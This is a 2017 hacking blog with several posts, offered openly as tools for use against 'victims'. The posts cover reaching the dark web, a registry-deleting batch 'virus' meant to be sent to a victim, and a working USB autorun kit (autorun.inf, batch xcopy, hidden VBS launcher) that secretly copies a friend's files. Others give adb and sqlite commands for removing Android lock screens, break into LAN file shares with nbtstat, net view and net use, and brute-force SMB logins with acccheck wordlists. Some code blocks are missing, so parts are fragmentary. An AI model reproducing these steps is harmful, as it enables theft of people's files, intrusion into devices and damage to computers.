Tuesday 18 April 2017

BEST HACKING WEBSITES OF DARK WEB.




How To Access The Deep Web or Darkweb


The deep web is not a single location, but a whole class of different locations which share one thing in common – that they are hidden from search engines and regular internet users. Different areas of the deep web therefore have different requirements for you to be able to access them, and any technology which you use will only give you access to its specific area of the hidden internet. Having said that, there is a very small number of technologies used to create what is popularly called the ‘deep web’ or ‘darknet’, and one in particular which the vast majority of people use – TOR


Best Hacking Websites on The Dark Net : –

The Art of Human Hacking



Strategic Intelligence Network.


SUMXI


Ranting for the Revolution..

Galaxy2

Hack Canada

Dur69

Hack Group

Hidden Answers




Monday 17 April 2017

How to Access Darknet (darkweb) : The Hidden Anonymous Internet

May be you are aware of the mysterious hidden internet called the 'DarkNet’ (DARK WEB) or ‘Deep Web’ that you can’t access from Google and which lies beyond the reach of most of the people like us. Perhaps you have heard of some Hacker selling credit card information, Online Data leaked of big companies(Ashley Madison,Sony,etc) and variety of these information. Maybe you live in a country where you are not allowed to speak freely… If you don’t know, then we will tell you what it is and how to access Darknet.

What is Dark Web?


First you would need to know about Deep Web. Deep web is 99% of the internet that is not accessible using Google. Deep Web includes large libraries, large databases and members’ only websites that are not available to the general public. If you have a library network in your College campus or database network in your company that only you can get access to, it is DarkWeb.

Darknet is an overlay network that can only be accessed using specific software,configurations,or authorization. It is part of the Deep Web, because its contents are not accessible through search engines. But it is something more, it is anonymous. It hosts anonymous websites. Yeah, you wouldn’t know who the owner is unless he explicitly reveal his information. It offers full anonymity to users too. Darknet anonymity is usually achieved using an ‘onion network’. I am sure you have cut an onion once in your lifetime and you had been crazy about the number of layers it has, same happens when you use an onion network. There are numbers of encryption layers that hide your true identity.

Uses of Darkweb:

Ok, so you have grasped what Darkweb is, Now you may ask me why should you use it. Well the reason could be any of them:

1~To better protect the privacy right of citizens from targeted and mass surveillance.
2~Whistleblowing and news leaks
3~Hacking and Computer Crime. (Maybe,you may want to chat with the most dangerous of hackers).
4~Sale of restricted goods.
5~File sharing. etc...

How to Access DARKWEB?


Well the most popular way to access Darknet is by using TOR browser. Technically, it stands for ‘The Onion Router’ and it is as simple as installing a new browser.

After that you would need a URL or directory that contains URLs to different websites or class of websites so that you know what to type in into the browser’s address bar.


You can easily get URLs in Onion Directory of Darweb at http://am4wuhz3zifexz5u.onion/ or just google for Darkweb Sites.
Make sure you use TOR Browser. .Also CLICK here and DOWNLOAD TOR Browser



Just like you have Google,Yahoo,etc for our widely known Internet, Darknet also has a Search Engine. Some are Torch, Duck Duck Go,etc...

If you want to access Darknet from your pretty PHONE, you can use ORBOT(Free).


I think you wanna explore Darknet yourself, So i would leave you here. Just a piece of advice, it is used for all things legal or illegal. So just make sure you verify the links you click.

NOTE: Access Darknet with your own risk. Darknet is filled with legal as well as illegal contents. Hence make sure that you don’t click or access any illegal content. If you are facing any problems, then comment below.

Sunday 16 April 2017

DANGEROUS VIRUS THAT CAN DAMAGE ANY COMPTER



> Disable Victim Antivirus
by sebding this virus


Open Notepad Copy text from given box and Paste To Notepad










Now Save this code as .bat and send to victim 😀

>Registry Deleter:-







:MESSAGE

ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!
GOTO MESSAGE

Function:- Once executed it will delete registry files and leave a message. It can extremely affect the victim’s computer.

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)







Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.


STEP 1


Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.


STEP 2


Open Notepad again and copy-paste the following lines



@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls



Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.


STEP 3


Open Notepad once again and copy-paste the following line.


CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs


This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4


Open Notepad one last time and copy-paste the following line.



wscript.exe \invisible.vbs file.bat



Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5


Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.












These Four Lines Of Code (VIRUS) Can Crash Anyone’s Smartphone And Computer

There’s a notorious link being shared on social networking websites that can crash nearly all smartphones — all you have to do is just click on this link. Known as , crashsafari.com (clicking on this will crash your browser), this link crashes your browser by overloading it with thousands of characters in the address bar each second. As a result, the phone memory exhausts and your device crashes.

Back in September, we encountered a similar bug in Google Chrome that caused the browser to crash with just 16 characters. This website link is being spread via apps, social networks, simple URLs, and shortened URLs. It should be noted that this bug isn’t malicious and it doesn’t break anything in your phone.

Devices affected by crashsafari.com;






The bug hits iPhone’s Safari browser in the worst manner possible. If you click on the link, it crashes your iPhone 6S or iPhone 5S running iOS version 9.2.1 or a regular iPhone 6 running iOS 9.2. After about 20 seconds, it’ll force the iPhone to reboot and heat up the device.

Even though the new bug is called crashsafari, it affects Android phones and Google Chrome as well. Apart from phones, this bug also affects desktop browsers if your computer doesn’t have enough RAM and CPU power.

How does crashsafari.com work?

crashsafari iphone bug



The website is running a small piece of JavaScript that creates a loop with the help of History API and crashes your device. The History API allows the websites to change the URL of the page without performing page refresh.

If you are an iPhone user, you should be very careful about any new incoming shortened links as they could forcibly reboot your phones. Notably, these links have already been opened 100,000 times. You are advised to take extra care as it’s being spread on the web via misleading links.

Saturday 15 April 2017

HACK ANDROID PATTERN LOCK BY 7 METHODS'''...








METHOD I



Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc…) Installed:

INSTRUCTIONS:



1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard
(using your PC, as you cant get into your phone, right )
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done!


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.





METHOD 2

Solution For Everyone Without Recovery Installed – ADB:

What You Need:


=>A computer running a Linux distro or Windows+Cygwin
=>USB cable to connect your phone to the PC
=>Adb installed


How to install adb:

1. Open Terminal
2. Type:

“sudo apt-get install android-tools-adb”
-> Hit [Enter]


3. Follow the instructions until everything is installed.

INSTRUCTIONS:

1. Connect you (turned on) Phone to the Computer via USB.
2. Open a terminal window.
3. Type:

adb devices
adb shell
cd data/system
su
rm *.key

4. Done.. Now You Just Have To Reboot.


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 3

Solution For Everyone Before Lock Accident :

SMS Bypass – Download IT FROM PLAYSTORE N INStall It On DEVICE.
This App Allows You To Remotely Bypass Your Phone’s Screen Lock By Sending A SMS.
It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
SMS Bypass App Requires Root.

INSTRUCTIONS:


1.First, make sure you give permanent root access to the app.
2.Change the secret code to your preferred choice. The default password is : 1234
3.To reset your screen lock, send the following message from another phone:


secret_code reset

example

1234 reset

Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset – Your phone will restart and your lock screen will be reset.
Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 4

Solution For Everyone Via Adb – SQL Command :

INSTRUCTIONS:


=>Type This Commands Separated In Your Terminal (CMD Prompt) :

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.quit

=>Now You Just Have To Reboot.


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 5

Solution For Everyone Via Adb – File Removal :

INSTRUCTIONS:


=>Type This Command In Your Terminal (CMD Prompt) :

adb shell rm /data/system/gesture.key


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 6

Solution For Everyone With USB Debugging Enabled :

INSTRUCTIONS:

Primary Step for all method:

Download & Extract to anywhere – Bypass Security Hack (Download from attachments)
Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
Navigate to Browse data tab, At table there, click to list down the selection & select secure.

Instruction To Remove Pattern Lock:

Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone

Instruction To Remove PIN Lock:

Now, Find Or Create lockscreen.password_type, double-click & change it’s value to 65536, Apply changes!
Now, find lock_pattern_autolock, Delete Record, If doesn’t exist, Ignore
Close & save database
Run push settings.db.cmd and reboot your phone

Instruction To Remove Password Lock:

Now, find lockscreen.password_salt, Delete Record
Now, find lockscreen.password_type, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 7

Solution For Everyone With Recovery Installed :

INSTRUCTIONS:

1.Download and Copy Aroma File manager.zip (Download from playstore)to your memory card.

2. Open your recovery (press volume Down + Power button or it can be different according to the phones. Generally the phones who have pressable button on the middle they have to press all three buttons. Google for you pattern there are lots)

3. There’ll b an option in recovery called “mount”. Go in that option and then mount all the cache and everything it is there.

4. Then select “update” and select “apply update from SD/external” and select aroma file manger.zip file that you downloaded using above QR code above.

5. After Flashing or updating, the aroma file manager will open. Use volume keys for up/down and power button 2 select like you use to get into recovery.






6. In aroma File manager , Go to menu , which is located in bottom strip and then select Settings.

7. Go to bottom n select “mount all partition in startup ” then exit from aroma file manager.

8. Now after exit, re-update that aroma file again and it will open again.

9. Go to data >> and then System.
Then find ‘gesture.key’ (for pattern lock) and ’password.key’ (for password lock) then long touch on gesture.key or password.key and sum option will be prompted , choose delete and delete that file and restart.


Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.






Friday 14 April 2017

Hack Into A Computer Which Is Connect On same network(Lan)








Step 1:-


Finding the Target




So first off we need to find a computer or the computer to hack into. So if your
plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and
Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local sub net. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.


Another window will pop up, make sure “All host in my subnet” is selected, and then
click ok.




It should begin to scan.





Then IP’s, computer names, and mac addresses will show up
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.



Step 2:- Trial and error.



Now, we don’t know if we have our designated target, or if we have a computer or
printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this
section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the
command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you
type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping
192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private
information):



IF it didn’t work, meaning that the target is not online, it will look something like this:



If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.

Step 3:– Gathering the information


Now, input this command “nbtstat –a (IP address of target).” An example would be
“nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the:
currently logged on user, workgroup, and computer name.



Step 4:- Getting In.



Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s
computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view
(IP Address of Target)”


An example for this tutorial would be: “net view 192.168.1.103”



We have our just found our share name. In this case, under the share name is “C,”
meaning that the only shared thing on the computer is C. Then to the right, under
Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C
DISK can sometimes be an entire person’s hard drive.




As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network
drive should be there.



Now, if you disconnect from the WAN or LAN, you will not be able to access this
drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to
access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files
and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
Congratulations! You’re DONE!



-Commands used in this tutorial:
PING

NBTSTAT -a (IP Address of Target)
NET VIEW (IP Address of Target)
NET USE K: (IP Address of Target)(SHARENAME)
-Program used in this tutorial:
Cain and Abel.







Tuesday 4 April 2017

HACK OLD PC n LAPTOP PASSOWRD EASILY BY KALI LINUX .











Sometimes you need a password to gain access to an older running Windows system. Maybe it's a machine in your basement you forgot about or a locked machine that belonged to a disgruntled employee. Maybe you just want to try out your pentesting skills.



When you need to access a running Windows system, you can use a dictionary attack tool like ACCCHECK to brute-force the admin's username and password as long as it's older Windows system (XP and earlier, possibly Windows 7).



Acccheck looks at Windows SMB protocol authentication, specifically the administrator account, and works over the network. Of course, if you have physical access to your machine, there are other ways to get the password, but if not, ACCCHECK is a good tool. And best of all, it's built right into Kali.


Step=>1


Starting Acccheck



Acccheck is included in Kali, so fire up a terminal and start the tool with:




acccheck




Step 2




Testing for the Default Username & Password




It will tell you a couple different ways to run the script, but you can run it straight away using the following basic syntax, where -t indicates a single host, and IP ADDRESS is the host IP of a Windows machine.


acccheck -t IP ADDRESS






That command will scan the IP address with the default "administrator" username and a blank password. It might not work, but you never know until you try!



Step 3




Testing a Suspected Username & Password






Unless you were really, really lucky, you got into the Windows computer in question already. If not, you'll have to get a little more detailed with your hack. We can be a little more thorough running the acccheck command with a few more parameters, such as:


acccheck -t IP ADDRESS -u USERNAME -p PASSWORD






In this command, -t is single host request, IP ADDRESS is your target Windows machine, -u USERNAME is the username you want to try, and -p PASSWORD is the password you think will work. Below, I'm trying "admin" and "password123" on the same machine.



If acccheck has success logging in, it creates a file called "cracked" in your working directory upon completion. After I tried a few more username and password combinations, I saw this file:




Investigating the file, I can see the IP, username, and password that worked for me. If you get on my network, you might get into 10.0.2.15 with amuck/bluesky123 as you can see below.



Step 4





Using Kali's Username & Password Lists
So now let's check out what more we can have acccheck do. Because it's a password cracker, acccheck accepts dictionaries, as well as any list of usernames you might have. On Kali, we can point at the stock dictionaries and username files, which are relatively large, and see if we have success. Below are the locations for these files.


=>/usr/share/dirb/wordlists/big.txt (dictionary file)



=>/usr/share/dirb/wordlists/others/names.txt (username file)





And this time, because you have more than one password and username to try, the syntax is a bit different—you'll need an uppercase -P and -U, which tells acccheck to search the passwords and usernames in the files. All together, this longer command is:


=>acccheck -t 10.0.2.15 -U /usr/share/dirb/wordlists/others/names.txt -P /usr/share/dirb/wordlists/big.txt





To reiterate, the uppercase letters are needed because we're calling files this time, not just words. And don't forget to use your own target IP address!





Danger: Running the command above will take a long time. The big.txt file is indeed big, and acccheck is checking all of the usernames you selected against all of the passwords, making this task very intensive! In the image above, produced when I ran the "top" command, you can see acccheck running, and it remained running for hours before I stopped it! (I eventually ran kill 19959 in a terminal, since I ran it against a VERY strong password.)


Step 5





Using Your Own Username & Password Lists





Acccheck can use more than the default username and password list included in Kali—we can use our own dictionary file, and our own list of usernames, too.




Here, I've used a popular dictionary file along with a standard list of Windows admin usernames as my password field (just admin, Admin, administrator, and Administrator). The same uppercase -P, and -U apply, because I'm calling files and not just passing individual words. My command is a lot shorter this time, however, because my files are located in the working directory:

=>acccheck -t 10.0.2.15 -U mynames.txt -P mypasswords.txt





If you've had success running acccheck against a Windows machine and it generated a valid cracked file, you should consider renaming the cracked file with a logical name, possibly including the IP address, to keep things straight moving forward. Here, I renamed my successful cracked file for 10.0.2.15 to something I will recognize in the future (cracked-10-0-2-15):



Step 6




Checking a List of IP Addresses






To get really aggressive, you can use an uppercase -T in your command to run acccheck against a range of IP addresses, not just one target IP address. I won't get into that here, but those files work the same as usernames and passwords, so get creative.




And as with many similar Windows exploits, pre-scanning your target IP to look for vulnerable ports is always a good idea, and Nmap is a good way to do just that.







Featured post

How to copy (steal) files from a computer to a pendrive (Latest VIRUS)

Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome...